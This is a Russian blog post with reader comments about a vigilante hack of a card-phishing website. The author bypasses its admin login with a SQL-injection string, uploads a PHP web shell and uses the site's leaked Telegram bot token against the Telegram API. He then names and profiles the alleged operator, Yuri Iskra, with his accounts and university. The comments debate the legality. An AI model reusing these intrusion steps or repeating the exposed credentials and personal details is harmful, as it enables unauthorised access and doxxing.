Как я хакера ловил

Аннотация


Каждый из нас может стать жертвой злоумышленника, но иногда хищник и добыча меняются местами.

Это краткая история о том, как неумелое использовании технологий может привести к раскрытию личности. Статья будет полезна как юным хакерам, желающим получить «легкие деньги», так и тем, кто хочет их поймать.

Введение


Одним февральским вечерком я был занят поиском места для романтичного свидания со своей возлюбленной. Через какое-то время мое внимание привлек сайт milleniumfilm.ru, не доступный в настоящее время. Сайт предоставлял услуги аренды небольших кинозалов для частного просмотра. Красивые картинки, умеренные цены, есть онлайн поддержка, одно но: данные банковской карты предлагалось ввести на не защищенной странице этого же домена. Насторожившись, я написал в техподдержку сайта, и мошенники не заставили себя долго ждать — поняв, что я достаточно технически грамотен послали меня на 3 буквы. Конечно, мошенникам нет смысла тратить на меня время, но зачем так грубо? — В любой ситуации нужно оставаться Человеком.

С отзывами о сайтах такого же плана можно ознакомиться тут: zhaloba-online.ru. Некоторые из них даже до сих пор работают.

Взлом


Чувствуя вселенскую несправедливость, с целью установления личности злоумышленника и пресечения его деятельности, я принялся изучать сайт на предмет уязвимостей. Ткнув пальцем в небо Первый введеный адрес привел меня в панель администратора, который вежливо просил указать «Логин» и «Пароль».

Скриншот

Первая же попытка SQL-инъекции Первый пришедший в голову пароль

1' or '1

дал мне доступ к настройкам сайта.

Скриншот.
Данный скриншот был сделан после атаки, потому имя пользователя такое говорящее.

Сайт создателя данного творения Gelloiss.ru красовался на первой же странице. Особенно интересным оказался раздел «Банковские карты» — там отображались все введенные данные: фамилия и имя держателя карты, номер карты, срок действия, cvc2 и код подтверждения из смс.

Большой скриншот. Часть данных закрашена.

Как это работает.
Получив реквизиты банковской карты, злоумышленник делает запрос на перевод средств с карты и перенаправляется платежной системой на страницу 3D-secure, где нужно ввести код из смс. Код приходит в смс на телефон жертвы, который вводит его в форме сайта. Получив код из смс, мошенник вводит его на странице 3D-secure подтверждая транзакцию. Вся эта схема требует неотлагательный действий самого мошенника, что наводит на мысль, что сайт должен быстро уведомлять о наличии жертвы.

На странице «Настройка фильмов» была достаточно простая форма для формирования тексто-графических блоков. Функция загрузки картинки не фильтровала контент загружаемых файлов, что навело на мысль о возможности залить php-shell. Шелл успешно залился в /images/, откуда я его скопировал в корень сайта под названием login.php. Получив доступ к консоли, я принялся изучать внутренности сайта.

Список файлов.

Среди содержимого меня привлек файл telegram.php.

Код.
$ cat telegram.php
<?
function send_mess($text) {
  $token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
  $mess = $text;
  $chat = "-302359340";
  /*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
  file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}

PHP скрипт содержал в себе токен телеграм-бота и отправлял сообщения в чат при вызове функции send_mess. Поискав по коду сайта стало ясно, что именно с помощью телеграм-бота злоумышленнику отправляются данные карт, смс код.

grep
./cart.php:22:send_mess("Имя клиента: ".$name."%0D%0AEmail: ".$email."%0D%0AТелефон: ".$phone."%0D%0AДата посещения: ".$date."%0D%0A"."Время: ".$time."%0D%0AГород: ".$city."%0D%0AСумма: ".$sum."%0D%0AСписок заказанных услуг: ".$services."%0D%0AIP: ".$ip."%0D%0AЗабанить: ".$link_ban_ip);
./pay/ms.php:21:  send_mess("Сумма: ".$sum."%0D%0AИмя владельца карты: ".$name."%0D%0AНомер карты: ".$num."%0D%0AСрок годности, месяц: ".$month."%0D%0AГод: ".$year."%0D%0Acvv: ".$cvv);

Что ж, у нас есть токен телеграм-бота, chat_id, адрес создателя сайта на котором красуется skype «ura7887» и telegram «Gelloiss» (раньше telegram не был указан, потому для того чтобы убедиться что telegram-аккаунт принадлежит владельцу сайта я использовал наживку).

Скриншот с сайта gelloiss.ru

Выясним, кто создал чат, в который бот отсылает сообщения.

curl
$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}

Как видно создатель чата имеет такой же username как и сайт создателя — «gelloiss».

Поиск


Помните: интернет ничего не забывает! Поиск по ключевым словам: «gelloiss», «ura7887», привел меня на страницу вконтакте Юрия Искры, где указан как сайт «Gelloiss.ru», так и skype «ura7887».

Скриншот.

А вот тут: vk.com видно, что данным скайп логином Юрий пользовался еще 6 лет назад, когда ему было 14 лет.

Скриншот.

А так же тут anime.anidub.com.

Скриншот.

Так же можно найти сообщение на форуме хакеров blackhacker.ru, с предложением продажи фишингового сайта.

Скриншот.


Проверка telegram


На момент начала истории, на сайте Gelloiss.ru не был указан логин telegram, потому мне нужно было связать владельца telegram-аккаунта с владельцем сайта или страницей вконтакте. Для этого я создал некий маркер, который владелец telegram-аккаунта должен будет разместить у себя.

shell
$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8  -

Далее я написал в telegram и представившить потенциальным заказчиком предложил пройти проверку: попросил разместить маркер a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 на странице вконтакте.

Скриншот диалога telegram

Заключение


Лично у меня не осталось сомнений, что страница вконтакте принадлежит злоумышленнику. На момент взлома сайта, в базе данных было не менее 100 различных номеров карт, а к моменту закрытия сайта еще +100.

В заключение давайте посмотрим, где учится наш «герой». Это легко определить посмотрев где учатся его «друзья по вузу» на странице вконтакте.

Большой скриншот

Продолжение следует


Мне удалось получить доступ к сообщениям, которые отсылает бот. Масштабы бедствия поражают: за 3 месяца телеграм-бот отослал примерно 13 тысяч сообщений. Даже если предположить, что всего-лишь пятая часть полученных данных валидна, то список пострадавших превысит 2 тысячи человек. Хакер работает не один, а с сообщниками, которые завлекают клиентов и помогают с переводом средств. На данный момент злоумышленники получают паспортные данные, телефоны и номера карт с сайта moneyonline.world.

Update 2019-04-21: Поскольку пользователь gelloiss убеждает в комментариях, что не был в курсе, для каких целей сайт будет использоваться, привожу фрагмент дампа сообщений telegram:
Скрытый текст
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message='Короче нужен сайт по «переводу карты на карту без комиссии» естесственно он должен высылать данные карты и код подтверждения мне', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),

Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\nТипа этого?)) \nДанные в телегу приходят', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ это платежная система для тех, кто зарабатывает в интернете. Электронный кошелек, прием платежей и вывод денег, денежные переводы. Мгновенная регистрация, выгодные комиссии.', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | Электронный кошелек, платежи, прием и вывод денежных средств', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Share post

Comments 273

    +36
    Отличная работа! Остаётся теперь передать информацию органам, пусть выполнят свою работу.
      +17
      Я задумался, а тот, кто взламывает хакера, может тоже быть обвинен во взломе или соучастии? Тем более автор скачал дамп, содержащий данные этих карт. Или это квалифицируется как самооборона?

      P.S. Что-то SQL инъекция слишком очевидная. Что если это ложная панель управления?

      P.P.S. А что если автор этого сайта хотел подставить gelloiss? Зачем в админке с очевидной инъекцией гордо указывать автора? Если я не путаю, из статьи понятно, что Юрий Искра доказал, что он владелец gelloiss.ru, но не сайта milleniumfilm.ru. (хотя gelloiss создал telegram-чат, можно ли подделать создателя чата?)
        +9
        По моему тот кто взламывает хакера тоже может быть обвинен. Если например самостоятельно схватить преступника который тебя обокрал вчера, то можно самому сесть по статье за ограничение свободы человека. Взломы должны проводиться лишь соответствующими органами.
          +8
          Если рассматривать по УК РФ, то там есть нюанс — уголовным преступлением является не любой взлом, а «если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации».

          То есть вот сохранять к себе на компьютер дамп сайта не стоило однозначно ни при каких условиях.
            +6
            А причем тут УК РФ, если Искра из Харькова? Скорее всего, ворует данные только у пострадавших с РФ, пользуясь «небратскими» отношениями сейчас у братских народов.
            Надо, чтобы чел с Украины его за жабры взял…
              +4
              Люди которые воруют, не делят жертв на своих, чужих, у которых это лишние карманные или последние до следующей зарплаты. Они делят всех на «я и остальные лохи», а времена Робин Гудов давно закончились.

              IMHO надо было в киберполицию это все слить.
            +12
            Если например самостоятельно схватить преступника который тебя обокрал вчера, то можно самому сесть по статье за ограничение свободы человека.
            Из постановления Пленума ВС РФ:
            Право на задержание лица, совершившего преступление, имеют не только уполномоченные на то представители власти, но и иные лица, в том числе пострадавшие от преступления, или ставшие его непосредственными очевидцами, или лица, которым стало достоверно известно о его совершении. [...] Превышение мер, необходимых для задержания лица, совершившего преступление, влечет за собой уголовную ответственность только в случаях умышленного причинения смерти, тяжкого или средней тяжести вреда здоровью. Если лицу, совершившему преступление, при задержании был причинен вред меньший, чем это предусмотрено в части 2 статьи 114 УК РФ, действия задерживавшего лица не образуют состава преступления.
              +2
              Нас в этой статье всегда смущал нюанс.
              По УК есть презумпция невиновности, до решения суда никакое деяние преступлением не является.
              Поэтому сама фраза «задержать лицо совершившее преступление» формально абсурдна, ведь за что бы его не задержали — преступлением это будет только после решения суда.
                +1
                Несколько не так.
                УК РФ, ст. 14.1:
                Преступлением признается виновно совершенное общественно опасное деяние, запрещенное настоящим Кодексом под угрозой наказания.

                Для признания деяния преступлением не требуется решения суда. Суд определяет виновность обвиняемого в совершении преступления и меру наказания в случае вины.
                  0
                  Но Вы же просто расшифровали термин преступление, доказывать что было совершено «виновно совершенное общественно опасное деяние, запрещенное настоящим Кодексом под угрозой наказания» ака «преступление» все равно надо.

                  Да и УПК так же думает
                  УПК РФ Статья 73. Обстоятельства, подлежащие доказыванию

                  "«1. При производстве по уголовному делу подлежат доказыванию:
                  »«1) событие преступления (время, место, способ и другие обстоятельства совершения преступления);


                  А вот полиция (согласно УПК) может задерживать лишь по подозрению в совершении
                  УПК РФ Статья 91. Основания задержания подозреваемого

                  »«1. Орган дознания, дознаватель, следователь вправе задержать лицо по подозрению в совершении преступления
                    0
                    Ну так чё получается? Если суд потом докажет, что преступник подозреваемый совершил преступление, то «активистам» — «всем спасибо, все свободны». Если же будет вынесено оправдание, то...?
                  0
                  Зато после решения суда оказывается, что деяние было преступлением всегда, а не стало таковым только что. Иначе абсурдной была бы уже фраза «преступление совершено».
              +3
              Я задумался, а тот, кто взламывает хакера, может тоже быть обвинен во взломе или соучастии?


              Формально — да. Ст. 272 ч. 1 УК РФ, сохранять дамп найденного к себе на компьютер не стоило совершенно точно.

              Или это квалифицируется как самооборона?


              Самооборона — это когда здоровью или жизни что-то непосредственно угрожает. А в данном случае правильным порядком действий с точки зрения УК примерно любой страны является обращение потерпевших в органы (и очевидная проблема — потерпевшим является тот, у кого деньги уже украли, при этом в силу специфики преступления найти других потерпевших трудно).
                +1
                Если лицу, совершившему преступление, при задержании был причинен вред меньший, чем это предусмотрено в части 2 статьи 114 УК РФ, действия задерживавшего лица не образуют состава преступления.

                То есть я могу задержать воришку и лещами аккуратно его положить на землю до приезда полиции? И мне ничего не будет, если я не сверну ему хобот нечаянно?
                  +1
                  Да.
                    +4
                    Тут существует потенциально крайне неприятная тонкость: если воришка получил вред здоровью средней тяжести при задержании, либо получил этот вред после, но убедил полицию/экспертов, что получил их во время задержания, то вы очень рискуете. Особенно, если воришка выглядит грустно, а окружающим его жалко.
                      0
                      Тут ещё одна тонкость- что посчитают вредом здоровью средней тяжести? Когда мой кум (на тот момент ещё просто коллега) попал в больницу после избиения, на его телесные повреждения «средней тяжести» нельзя было взглянуть без слёз. Но зная наши органы… могут ведь и наоборот перевернуть.
                        +1
                        Есть приказ Министерства здравоохранения, устанавливающий «медицинские критерии квалифицирующих признаков тяжести вреда здоровью». Оценку производит судмедэксперт.
                        Если кратко, то лёгкий вред — нетрудоспособность до 21 дня и потеря до 10% общей трудоспособности.
                          0
                          10% это перманентно или на ограниченный период? Интересно а как можно оценить трудоспособность?
                            0
                            Это перманентно. Оценка производится по специальным таблицам в приложении к тому же приказу. 10% это, например, черепно-мозговая травма, повлекшая за собой значительно выраженные вегетативные симптомы (тремор век и пальцев рук, высокие сухожильные рефлексы, вазомоторные нарушения и др.).
                  +6
                  P.P.S. А что если автор этого сайта хотел подставить gelloiss? Зачем в админке с очевидной инъекцией гордо указывать автора? Если я не путаю, из статьи понятно, что Юрий Искра доказал, что он владелец gelloiss.ru, но не сайта milleniumfilm.ru. (хотя gelloiss создал telegram-чат, можно ли подделать создателя чата?)

                  Такой вариант тоже возможен, но близок к невероятным. Создателя чата подделать невероятно сложно, но можно украсть сам телеграм аккаунт. Сообщения в чате есть как минимум с января, а значит украденный телеграмм аккаунт на сайте более 3х месяцев. (Хотя я то знаю, что он там [на сайте] появился совсем недавно). Напомню, что владелец телеграмм аккаунта разместил маркер на сайте gelloiss.ru

                  Если продолжить рассматривать маловероятные сценарии, то скорее кто-то много-много лет пытается подставить Юрия: писал от его имени различные сообщения на хакерских форумах, указывая для связи его скайп.
                    +5
                    Ну почему сразу подставить Юрия?
                    Вам знакомо поняте «кража личности»?
                    Просто кто-то мог взять себе данные реального человека и творить сови делишки…
                  +10
                  Ну т накажут ТС по всей строгости закона за взлом, за обман доверчивого мошенника, за добычу персональных данных, приклеют ему же фишинг на основании найденных НА ЕГО компьютере данных банковских карт и иной конфедициальной информации…

                  Я задумался, а тот, кто взламывает хакера, может тоже быть обвинен во взломе? Или это квалифицируется как самооборона?

                  Скорее всего, будет квалифицировано как превышение пределов необходимой обороны.
                    +3

                    Кажется, добытые незаконно доказательства таковыми не являются. Поэтому привлечь внимание можно, но гарантий никаких нет, хотя наводка знатная.

                      +10
                      Мы не в Америке. Но гарантии есть — что сядет обратившийся.
                        +4
                        Для начала, посторонние граждане вообще добычей доказательств не занимаются и заниматься не могут. Максимум, что они могут — в соответствии со ст. 140 ч. 1 УПК РФ сообщить «о совершенном или готовящемся преступлении».
                        +15
                        Знакомый человек близкий к органам считает, что в виду сложных отношений с Украиной, подозреваемому ни чего не угрожает. Гораздо действенней может оказаться социальное давление, или действия службы безопасности банка (клиенты которого пострадали). В любом случае, без заявлений пострадавших — делу ход не дать.
                          +1
                          Я не очень понимаю, как вообще работают мошеннические схемы с выводом денег при онлайн-оплате картами. Разве при оплате картой они не перечисляются со значительной задержкой, во время которой клиент может оспорить платеж? А если много клиентов требуют вернуть деньги, банк должен вообще заблокировать счет. Плюс для снятия денег, наверное, нужно предъявить кучу документов.
                            +3
                            А где гарантии того что деньги выводятся на счет? Вот пару месяцев назад, открыл для себя новый вид обналички, скамер после получения данных производит обмен фиата на крипту в обменнике с автообменом. И что сдесь блокировать? Целый блокчейн? Обменник?
                              –2
                              А вы пробовали когда-нибудь отменить сделанный платёж? В США это можно сделать в течение месяца. У нас же — только по личному походу в банк и на это отводятся только сутки.
                                +1
                                Я пробовал. Купил игру в стиме помеченную что она с русским — но она оказалась с русским только для Windows. Сам стим хотел вернуть фантики на их счету — но я не планировал никаких покупок игр в стиме — поэтому этот вариант меня не устроил. Написал в поддержку карты и приложил переписку со стимом. Деньги вернули за 30 дней. Никакого посещения офиса не потребовалось. Если бы отказались можно было бы вернуть через мастеркард приложив переписку с банком.
                                  0
                                  Что за банк, если не секрет?
                                    0
                                    Кажется это была карта «кукуруза». Но более я её рекомендовать не могу.
                                    по другим причинам
                                    1. Как-то у них закончился «процент на остаток» и мне пришлось ехать в другой город, чтобы забрать свои деньги — банк который держал эти деньги не хотел мне удалённо возвращать их на кукурузу (Промсвязьбанк). Естественно на те полгода пока я собирался посетить их офис проценты никто не начислил.
                                    2. Поменял паспорт и их поддержка (через «связной») долго не могла правильно обработать моё заявление — пополнить карту я не мог довольно долго из-за этого.
                                    0
                                    Купил как-то игру в стиме (с полгода назад), деньги списали. Игра оказалась для виндовз, в поддержке стима завел по шаблону тикет, через день вернули деньги в карту. Давно ваш случай был?
                                      0
                                      Очень давно — может 3-5 лет назад
                                    +2
                                    Отменял покупку игры в google play. При чем, отменил я ее дня через два, после покупки. Вообще, на кнопку нажал только ради интереса, ибо «как это так, я деньги отдал, игра у меня, а теперь можно обратно вернуть?». Ну и игра удалилась, а деньги вернулись)
                                      0
                                      Оплатил как-то раз билайновский интернет, деньги почему-то на счёт не пришли (один раз такое было). Да, пришлось сходить лично в банк, но лимита в сутки нет. Написал заявление, через какое-то время деньги вернули. Процедура, строго говоря, не банковская, а платёжной системы (чарджбэк).
                                        +1
                                        Тинькофф мне пару раз возвращал деньги (один раз ошибочно два раза списали в магазине, воторой раз онлайн-мошенники продали левый ключ к игре) по телефонному обращению. Никаких суток и походов в банк.
                                          0
                                          У меня была ситуация когда Aliexpress по какой-то причине заморозил заказ и аккаунт. Писал в чат Тинькофф, приложил скриншоты — они создали обращение, которое провисело недели две и деньги вернулись. Однако уверенности в том, что это сделал банк, а не сам Али у меня нет, по срокам если честно больше подходит под возврат с Али. Тем не менее такая возможность действительно есть.
                                        +1
                                        Однозначно проблема будет вернуть если перевод был физлицу.
                                          0
                                          Точно, не подумал об этом.
                                          +1
                                          Была ситуация такого рода. Подруга играет в он-лайн игру и периодически делает покупки. В один момент ей посыпались смс со списанием денег по аналогичной услуге, но она на данный момент не едлала никаких покупок. Ладно хоть денег на этой карте было 2000 руб.
                                          Но ни обращение в гугл, ни в банк не вернули эти деньги. Типа нет доказательств, что эти платежи мошеннические.
                                            +1
                                            Насколько я понимаю в статье речь идет о card2card переводах, а их оспорить довольно таки сложно (хотя несколько лет назад даже закон принимали, по которому в течении суток любую транзакцию можно оспорить). Но техническая возможность у банка есть, например я один раз пытался перевести 30к через card2card, банк сам молча сначала заморозил, а потом отменил транзакцию (правда есть нюанс, c2c сервис принадлежал банку, который выпустил карту отправителя).

                                            А вообще по правилам Visa и MC можно вообще в течении 60 дней или около того вернуть деньги. Это называется чарджбэк. Но процедура достаточно сложная и я не думаю что она распространяется на что-то, кроме операций покупок (а c2c перевод такой операцией не является).
                                          –26
                                          В бантустане этого Юрия Искры «органы» разве что в долю войти могут. Да ещё «звезду хероя» выдать за «подвиг». Хероям слава!
                                            +19
                                            Вот человека заминусовали, а я, как житель Украины, поддержу его слова — с большей вероятностью наши представители правоохранительных органов будут крышевать такой прибыльный бизнес (согласно данных, указанных в статье — 13 тысяч сообщений и 2000 предполагаемых жертв), чем бороться с ним.
                                            К сожалению, таковы реалии нашей страны — зарплата сотрудников киберполиции далека даже от зарплаты джуна в нормальной аутсорс компании, так что выживают, как могут (я не одобряю и не поддерживаю такое положение дел, просто констатирую факт).

                                            Но на счет «звезды хероя» — это, конечно, перебор) Всё будет сделано максимально тихо и незаметно.
                                              +1
                                              Но таким образом прибыль от незаконных действий будет размазана и на других участников. А, значит, разработчик получит меньше денег (не говоря уже о других проблемах при работе с коррумпированной полицией). И в итоге хакер может решить, что доход слишком мал, чтобы так мараться; найдет нормальную работу.
                                                0

                                                сдаётся мне, попытка "соскочить" может оказаться дороже продолжения делиться

                                                0
                                                1. я, как житель Украины, скажу что сайт никаким образом не определяет житель какой страны спалил данные своей карточки.

                                                2. Опять же зарплата сотрудников киберполиции невелика, они тем более не будут разбирать что да как. Но для возбуждения уголовного дела, нужно чтобы в полицию обратился постардавший. Обратится — проведут расследование. А завершенные дела киберполиции очень нужны, тем более такие, где нарушитель не сын очередного депутата.
                                                  +3
                                                  Но для возбуждения уголовного дела, нужно чтобы в полицию обратился постардавший.
                                                  То есть, дело об убийстве не заводится, пока пострадавший не напишет заявления?
                                                    +2
                                                    Ну если на улице лежит мертвый человек, обычно дело об убийстве сразу не заводится.

                                                    Сперва вызывается скорая, а дело об убийстве — если есть подозрение на убийство, а не на инфаркт. Так и тут — киберполиция вообще не знает о существовании сайта.
                                                    Я может не совсем корректно сказал, что только пострадавший может обратиться. Но в общем случае да, без пострадавшего будет сложно понять что расследовать.

                                                    В конкретном нашем случае, есть контакты с карточек — можно передать их, пусть полиция свяжется.
                                              0
                                              Молодец, давить таких нужно.
                                              –5
                                              Он не хакер, а малолетний дебил. Всего его хаки — соц. инженерия. На бутылку
                                                +21
                                                Мне казалось, habrahabr не место для подобных высказываний.
                                                  +18
                                                  Он не хакер, а малолетний дебил. Всего его хаки — соц. инженерия
                                                  Митник вряд ли согласился бы с тем, что «соц.инженерные хаки» это признак дебилизма. Почитайте его «искусство обмана», если не читали.
                                                    –10

                                                    Обманывать людей уже признак не очень умного человека. А если ты хорош на выдумки того, как именно обмануть, это не показатель ума.

                                                      +2
                                                      Обманывать людей уже признак не очень умного человека.
                                                      А вы умеете обманывать? Нет? Для социальной инженерии тоже знания нужны и на дороге они не валяются. А для того чтобы обманывать умных, нужно быть ещё умнее. К тому же умея защищаться от обманы частично учишься и обманывать
                                                        0
                                                        По вашей логике разведчики, актёры и даже врачи не блещут умом?
                                                          0
                                                          Хм.На текущий момент, самые крупные в денежном смысле преступления были сделаны при помощи обмана и социальной инженерии.
                                                            0
                                                            Обманывать людей уже признак не очень умного человека
                                                            Возможно вы имели ввиду что строить свою жизнь на обмане это не совсем умно?
                                                            Тогда да, это так. Хорошая репутация это самая хорошая стратегия.
                                                            Но! Элементы обмана присутствую везде в какой-то мере, без этого никуда.
                                                            Думаю Митник врет напропалую, пытаясь найти брешь в системе безопасности компании которая заказала ему аудит.
                                                              0
                                                              >Обманывать людей уже признак не очень умного человека.
                                                              Что поделать, если сейчас проще обмануть человека, чем машину?
                                                              Вот и выкручиваются как могут, «хакеры».
                                                              Хотя, по мне — им таким нужно другое название придумать. Как вам «шулеры»?
                                                                0
                                                                Как вам «шулеры»?
                                                                Лгуны же! То юзер агент подменят, то под видом ввода команды код возврата перезапишут, то vpn под сайт замаскируют, то пароль себе придумают, то админом представятся, а то и вообще заказчиком!
                                                            –1
                                                            Я правильно понимаю что хабрасообщество осуждает критику преступлений?
                                                              +3
                                                              Ваши комментарии не несут смысловой нагрузки, просто эмоции в воздух. Лично мне не очень интересно, что вы думаете об этом человеке. Я вас не минусовал по понятным причинам.
                                                                –2
                                                                Мальчика назвали хакером, я сказал что он не является хакером. Всё. Словил кучу минусов. (Куча примеров, где в комментах пишут свои эмоции пользователи, и все ок. Но если ты пишешь не про хорошие эмоции — кик. Что ж)
                                                                  +1
                                                                  я сказал что он не является хакером.
                                                                  У этого слова есть несколько смыслов. И смысл который в него вкладывает журналист отличается от смысла, который в него вкладывали системщики из 80. Само по себе слово ничего не значит.
                                                                    +6
                                                                    Мальчика назвали хакером, я сказал что он не является хакером.


                                                                    Он не хакер, а малолетний дебил. Всего его хаки — соц. инженерия. На бутылку

                                                                    compare string — result false.
                                                                      –2
                                                                      Ну да, давайте ещё будем выискивать места, где вместо короткого тире длинное поставилось из-за дрогнувшего пальца и двух минусов подряд в тексте)
                                                                      Смысл высказываний одинаков, так что true == Thoughts.compare(thoughFirst, thoughSecond);
                                                                        +2
                                                                        В том-то и проблема, что смысл тоже разный.
                                                                  +11
                                                                  Я правильно понимаю что хабрасообщество осуждает критику преступлений?
                                                                  Вы считаете что «критикуя преступление» можно писать что угодно и это должно приниматься на ура? Мы Вас не минусовали, но тем не менее считаем что Вы не правы во многом, разберем по пунктам
                                                                  1) «Он не хакер» — в современной терминологии хакер это «компьютерный злоумышленник», т.е. Вы по сути говорите что он «не компьютерный злоумышленник» Где тут критика? Да пес с ней с критикой, где логика?
                                                                  2) «Он малолетний» — даже если так, то почему Вы это произносите в негативном ключе, разве есть что-то позорное в том что бы быть малолетним?
                                                                  3) «дебил» — термин дебил это объективный показатель низкого IQ, условно говоря. У Вас не только нет оснований так заявлять, но и называя его так, Вы косвенно называете людей которых он обманул еще бОльшими дебилами — двойной фэил.
                                                                  4) «Всего его хаки — соц. инженерия» — это уже писали, но еще раз — соц.инжинерия это тоже хакерство.
                                                                  5) Мало того, Вы вообще не критикуете преступление, вся Ваша фраза направлена в адрес человека, а не его деяния.
                                                                    +1
                                                                    Детям присущ эгоцентризм и правовой нигилизм. Для них упрощение мира до "+" и "-", и отражение его через собственную недоразвитую эмоциональную сферу является наиболее естественной формой реакции вообще на всё.
                                                                      0
                                                                      Не путайте объективную критику и личное осуждение.
                                                                      +1
                                                                      Некий (возможно даже хакер?) Кевин Митник, регулярно пользовался социальной инженерией, и даже утверждал, что «от человеческой глупости нет патча».
                                                                      +9
                                                                      Особенно забавляет, как он в 2016 на своем сайте писал про свое отношение к «грязным проектам».
                                                                      image
                                                                        +7
                                                                        > свое отношение к «грязным проектам»
                                                                        Настройка, доработка, установка, копирование
                                                                        Обычно нормальным людям стыдно такое говорить, а этому нет. Значит он изначально был готов на то, чтобы у кого-то что-то украсть. Плюс очень странно, что он вообще на этом акцентировал внимание, как будто тебя сразу же после публикации каждый день засылают предложениями о работе на черный рынок…
                                                                          0
                                                                          как будто тебя сразу же после публикации каждый день засылают предложениями о работе на черный рынок

                                                                          Засылают… Ещё как! Сам лично с этим сталкивался. После регистрации на одной фриланс бирже разместил своё резюме, спустя день на почте было около 7-ми писем с предложениями аля «Нужен веб-девелопер для разработки фишинг-сайта» и не сказал бы что ценник сильно отличался от белых проектов, в некоторых случаях даже был меньше
                                                                        +3
                                                                        Не очень понятно, Юрику заказали сайт и он его сделал, отдал заказчику и поддерживает,
                                                                        какие претензии к нему могут быть?
                                                                        Он ведь не владелец сайта milleniumfilm.ru, а у что там заказчик разместил и для чего использует, не его проблемы.
                                                                          +6
                                                                          А это уже «деяния, совершенные группой лиц по предварительному сговору». За них ещё больше дают.
                                                                            +13
                                                                            Дело в том, что не просто «группой лиц», а «по предварительному сговору». И сговор это не просто заказ на разработку сайта, а именно сговор с умыслом совершить преступление. Иначе можно было бы сажать всех — производителя компьютера, платного репетитора, хостера и т.д… — всю группу лиц которая хоть как-то участвовала.

                                                                            Мало того, если подумать, то из поста не следует что сайт мошенник. Просит ввести данные карты? Ну и? А кто при оплате не просит?
                                                                            Букинг, например, тоже просит ввести цвв у себя на сайте и мало того, данные карт передает отелям прямым текстом. habr.com/en/post/442378
                                                                            Знаем как минимум 2 реальных агрегатора/поисковика для покупки авиабилетов где сайт поступает так же, просит ввести данные карты у себя на сайте, один тоже телеграмм ботом их отсылает.
                                                                            ссл сертификата нет? Тоже не признак мошенничества. А то что автора послали на три буквы — опять же, обидно, но не мошенничество.
                                                                            Т.е. это все конечно bad practice, может быть даже АК за обработку ПД, но никак не УК — в рамках данной доказательной базы.
                                                                            Вот если бы автор пробил по адресу «кинотеатр» и обнаружил бы что его там нет или что сайт не имеет к нему отношнеие — это был бы аргумент (если кинотеатр реально есть и это его владелец, то в чем нарушение?), опять же не финальный, т.к. для финального необходимо еще доказать материальный ущерб (создатель сайта может отмазаться тем, что он пишет дипломный проект о легковерии идиотов в интернете).

                                                                            На случай если кто-то бросился писать гневный коммент на тему что мы защищаем мошенника — нет, мы как раз объясняем почему поспешные обвинения могут оказаться пшиком и чуть что развалиться и что надо их строить на более сильной базе.

                                                                            Что касается возможности притянут ТС за «взлом», то статья 12 и 14 гк в принципе дают ему определённую свободу действий (самозащита прав), т.к. он действовал в целях пресечения правонарушения и не создал дополнительного ущерба.

                                                                            Ну и отдельно, конечно, поражает то, что все это вообще возможно. Вроде везде проверка паспортов, даже если ты копейки на центы поменять хочешь, к вай-фаю без номера телефона не подсоединиться, а мошенники спокойно заводят какие-то подставные счета, выводят через них деньги и остаются безнаказанными. Как так? Видимо, пока они не финансируют антиправительственные митинги, особого интереса они не вызывают.
                                                                            Sabubu дело в том., что карточная система изначально пришла из сша/европы, где в случае мошенничества банк/платежная система без проблем возмещает ущерб. Для россии это тоже отчасти работает, только немного через ж-пу, но в принципе через визу/МС вполне можно вернуть мошеннический платеж в возврате которого откажет банк. В общем by design мошенничество никого не парило, т.к. деньги клиентам возвращались.
                                                                            Еще нюанс в том, что в ряде случаев оплата вообще совершается без участия банка в момент оплаты, т.н. оффлайн платежи. В банк данные об оплате приходят пост-фактум и он его в принципе задержать не может.
                                                                            И добивает эту ситуацию тот факт, что прием оплаты зависит от мерчанта. Мерчант может его настроить так, что бы никаких лишних проверок не было и даже cvv не требовался. В таких случаях платеж намного легче вернуть, но некоторые мерчанты осознанно идут на такой риск в целях клиентоориентированности (не в целях мошенничества, т.к. штрафы там дикие при большом количестве возвратов, нет смысла).

                                                                            Как я понимаю, там есть куча способов снять деньги: перевод на счет сотового телефона, вывод через ставки или казино, покупка криптовалют итд.
                                                                            Угу. Или на авито что-нибудь купить с предоплатой. Мол я сейчас Вам денег на карту скину, а вечером заеду товар заберу. Вы такой радостный что у Вас товар купили, а завтра к Вам маски-шоу за полученный мошенничеством платеж на карту с изьятием компьютера и тыды.
                                                                              0
                                                                              >А кто при оплате не просит?
                                                                              Ну так-то подавляющие все честные сайты работают через платёжных агрегаторов, поскольку сертифицировать себя для обработки ТАКИХ данных стоит 100500 нефтей.

